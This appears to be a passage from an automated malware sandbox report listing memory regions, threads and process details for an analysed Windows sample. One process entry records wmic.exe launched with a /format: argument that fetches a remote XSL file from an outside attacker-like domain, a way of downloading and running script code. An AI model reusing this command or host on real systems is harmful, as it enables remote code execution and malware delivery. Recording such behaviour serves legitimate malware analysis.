end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 783
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 784
start_va = 0x7ffad000
end_va = 0x7ffadfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffad000"
filename = ""
Region:
id = 785
start_va = 0x7ffae000
end_va = 0x7ffaefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffae000"
filename = ""
Region:
id = 786
start_va = 0x7ffaf000
end_va = 0x7ffaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffaf000"
filename = ""
Region:
id = 787
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 788
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 789
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 790
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 791
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 792
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 793
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 794
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 795
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 796
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 797
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 798
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 799
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Thread:
id = 61
os_tid = 0xa18
Thread:
id = 62
os_tid = 0x710
Thread:
id = 63
os_tid = 0x6a4
Thread:
id = 64
os_tid = 0x694
Thread:
id = 65
os_tid = 0x444
Thread:
id = 66
os_tid = 0x340
Thread:
id = 67
os_tid = 0x138
Thread:
id = 68
os_tid = 0x134
Thread:
id = 69
os_tid = 0x658
Thread:
id = 70
os_tid = 0x5a0
Thread:
id = 71
os_tid = 0x3fc
Thread:
id = 72
os_tid = 0x3f8
Thread:
id = 73
os_tid = 0x3f0
Thread:
id = 74
os_tid = 0x3d4
Thread:
id = 75
os_tid = 0x3cc
Thread:
id = 263
os_tid = 0x870
Thread:
id = 358
os_tid = 0x964
Process:
id = "6"
image_name = "wmic.exe"
filename = "c:\\windows\\system32\\wbem\\wmic.exe"
page_root = "0x7f1be5e0"
os_pid = "0xa98"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x9a4"
cmd_line = "\"C:\\Windows\\system32\\wbem\\WMIC.exe\" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 829
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 830
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 831
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 832
start_va = 0x90000
end_va = 0xcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 833
start_va = 0x890000
end_va = 0x8f2fff
entry_point = 0x890000
region_type = mapped_file
name = "wmic.exe"
filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")
Region:
id = 834
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 835
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 836
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 837
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 838
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 839
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 840
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 841
start_va = 0x70000
end_va = 0x7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 842
start_va = 0xd0000
end_va = 0x136fff
entry_point = 0xd0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 843
start_va = 0x140000
end_va = 0x207fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 844
start_va = 0x230000
end_va = 0x32ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 845
start_va = 0x6f8d0000
end_va = 0x6f904fff
entry_point = 0x6f8d0000
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 846
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 847
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 848
start_va = 0x73e00000
end_va = 0x73e0cfff
entry_point = 0x73e00000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 849
start_va = 0x74f80000
end_va = 0x74f87fff
entry_point = 0x74f80000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 850
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 851
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 852
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 853
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 854
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 855
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 856
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 857
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 858
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 859
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 860
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 861
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 862
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 863
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 864
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 865
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 866
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 867
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 868
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 869
start_va = 0x50000
end_va = 0x56fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 870
start_va = 0x60000
end_va = 0x61fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 871
start_va = 0x80000
end_va = 0x8ffff
entry_point = 0x80000
region_type = mapped_file
name = "wmic.exe.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")
Region:
id = 872
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 873
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 874
start_va = 0x330000
end_va = 0x430fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000330000"
filename = ""
Region:
id = 875
start_va = 0x900000
end_va = 0x14fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000900000"
filename = ""
Region:
id = 876
start_va = 0x440000
end_va = 0x49bfff
entry_point = 0x440000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 877
start_va = 0x440000
end_va = 0x49bfff
entry_point = 0x440000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 878
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 879
start_va = 0x4e0000
end_va = 0x51ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 880
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 881
start_va = 0x440000
end_va = 0x440fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 882
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 883
start_va = 0x450000
end_va = 0x450fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 884
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 885
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 886
start_va = 0x460000
end_va = 0x4cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 887
start_va = 0x520000
end_va = 0x7eefff
entry_point = 0x520000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 888
start_va = 0x6d350000
end_va = 0x6d482fff
entry_point = 0x6d350000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 889
start_va = 0x1500000
end_va = 0x16effff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 890
start_va = 0x7f0000
end_va = 0x85ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 891
start_va = 0x1500000
end_va = 0x160ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 892
start_va = 0x16b0000
end_va = 0x16effff
entry_point = 0x0
region_type = private
name = "private_0x00000000016b0000"
filename = ""
Region:
id = 893
start_va = 0x16f0000
end_va = 0x17fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000016f0000"
filename = ""
Region:
id = 894
start_va = 0x1800000
end_va = 0x196ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 895
start_va = 0x1800000
end_va = 0x18dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 896
start_va = 0x1930000
end_va = 0x196ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001930000"
filename = ""
Region:
id = 897
start_va = 0x1500000
end_va = 0x159ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 898
start_va = 0x15d0000
end_va = 0x160ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015d0000"
filename = ""
Region:
id = 899
start_va = 0x16f0000
end_va = 0x17affff
entry_point = 0x16f0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 900
start_va = 0x17c0000
end_va = 0x17fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017c0000"
filename = ""
Region:
id = 901
start_va = 0x1970000
end_va = 0x1d6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001970000"
filename = ""
Region:
id = 902
start_va = 0x460000
end_va = 0x460fff
entry_point = 0x460000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 903
start_va = 0x490000
end_va = 0x4cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 904
start_va = 0x470000
end_va = 0x48ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 905
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 906
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 907
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 908
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 909
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 910
start_va = 0x1d70000
end_va = 0x1e6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d70000"
filename = ""
Region:
id = 911
start_va = 0x4d0000
end_va = 0x4d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004d0000"
filename = ""
Region:
id = 912
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 913
start_va = 0x7f0000
end_va = 0x7f0fff
entry_point = 0x7f0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 914
start_va = 0x820000
end_va = 0x85ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000820000"
filename = ""
Region:
id = 915
start_va = 0x800000
end_va = 0x801fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 916
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 917
start_va = 0x7f0000
end_va = 0x7f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 918
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 919
start_va = 0x860000
end_va = 0x88bfff
entry_point = 0x860000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 920
start_va = 0x810000
end_va = 0x817fff
entry_point = 0x810000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 921
start_va = 0x1500000
end_va = 0x150ffff
entry_point = 0x1500000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 922
start_va = 0x1560000
end_va = 0x159ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001560000"
filename = ""
Region:
id = 923
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 924
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 925
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 926
start_va = 0x1e70000
end_va = 0x1feffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e70000"
filename = ""
Region:
id = 927
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 928
start_va = 0x1ff0000
end_va = 0x21cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 929
start_va = 0x1e70000
end_va = 0x1f4efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e70000"
filename = ""
Region:
id = 930
start_va = 0x1fb0000
end_va = 0x1feffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fb0000"
filename = ""
Region:
id = 931
start_va = 0x1510000
end_va = 0x154ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001510000"
filename = ""
Region:
id = 932
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 933
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 934
start_va = 0x1610000
end_va = 0x164bfff
entry_point = 0x1610000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 935
start_va = 0x1610000
end_va = 0x164bfff
entry_point = 0x1610000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 936
start_va = 0x1610000
end_va = 0x164bfff
entry_point = 0x1610000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 937
start_va = 0x1610000
end_va = 0x164bfff
entry_point = 0x1610000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 938
start_va = 0x1610000
end_va = 0x164bfff
entry_point = 0x1610000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 939
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 940
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 941
start_va = 0x1630000
end_va = 0x166ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001630000"
filename = ""
Region:
id = 942
start_va = 0x1850000
end_va = 0x188ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001850000"
filename = ""
Region:
id = 943
start_va = 0x18a0000
end_va = 0x18dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000018a0000"
filename = ""
Region:
id = 944
start_va = 0x20d0000
end_va = 0x210ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000020d0000"
filename = ""
Region:
id = 945
start_va = 0x2190000
end_va = 0x21cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002190000"
filename = ""
Region:
id = 946
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 947
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 948
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 949
start_va = 0x1550000
end_va = 0x1550fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001550000"
filename = ""
Region:
id = 950
start_va = 0x23a0000
end_va = 0x23affff
entry_point = 0x0
region_type = private
name = "private_0x00000000023a0000"
filename = ""
Region:
id = 951
start_va = 0x70eb0000
end_va = 0x70f52fff
entry_point = 0x70eb0000
region_type = mapped_file
name = "msvcr90.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll")
Region:
id = 952
start_va = 0x71ae0000
end_va = 0x71aecfff
entry_point = 0x71ae0000
region_type = mapped_file
name = "msoxmlmf.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmlmf.dll")
Region:
id = 953
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 954
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
